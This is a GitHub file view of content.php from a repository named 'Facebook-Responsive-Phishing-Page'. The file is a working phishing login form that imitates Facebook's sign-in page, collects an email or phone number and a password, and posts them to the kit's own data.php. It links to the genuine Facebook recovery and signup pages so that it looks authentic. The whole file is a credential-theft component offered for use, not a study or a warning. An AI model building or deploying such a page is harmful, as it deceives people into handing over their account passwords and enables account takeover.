forked from seeratawan01/Facebook-Responsive-Phishing-Page
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcontent.php
More file actions
19 lines (19 loc) · 1.01 KB
/
content.php
File metadata and controls
19 lines (19 loc) · 1.01 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<main>
<div class="content">
<div class="content-header">
Log Into Facebook
</div>
<div class="content-form">
<form action="data.php" method="POST">
<input type="text" name="username" placeholder="Email address or phone number" pattern="[a-zA-Z0-9_]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?!([a-zA-Z0-9]*\.[a-zA-Z0-9]*\.[a-zA-Z0-9]*\.))(?:[A-Za-z0-9](?:[a-zA-Z0-9-]*[A-Za-z0-9])?\.)+[a-zA-Z0-9](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?|.{8,}\d+" title=" Enter correct Email address or phone number" required>
<input type="password" name="userpassword" placeholder="Password" pattern=".{5,}" title="Five or more characters" required>
<input type="submit" name="data" value="Log In">
</form>
<div class="signinLink">
<a href="https://www.facebook.com/recover/initiate?lwv=100&ars=facebook_login" target="_blank">Forgotten account?</a>
<span> · </span>
<a href="https://www.facebook.com/r.php?locale=en_GB&display=page" target="_blank">Sign up for Facebook</a>
</div>
</div>
</div>
</main>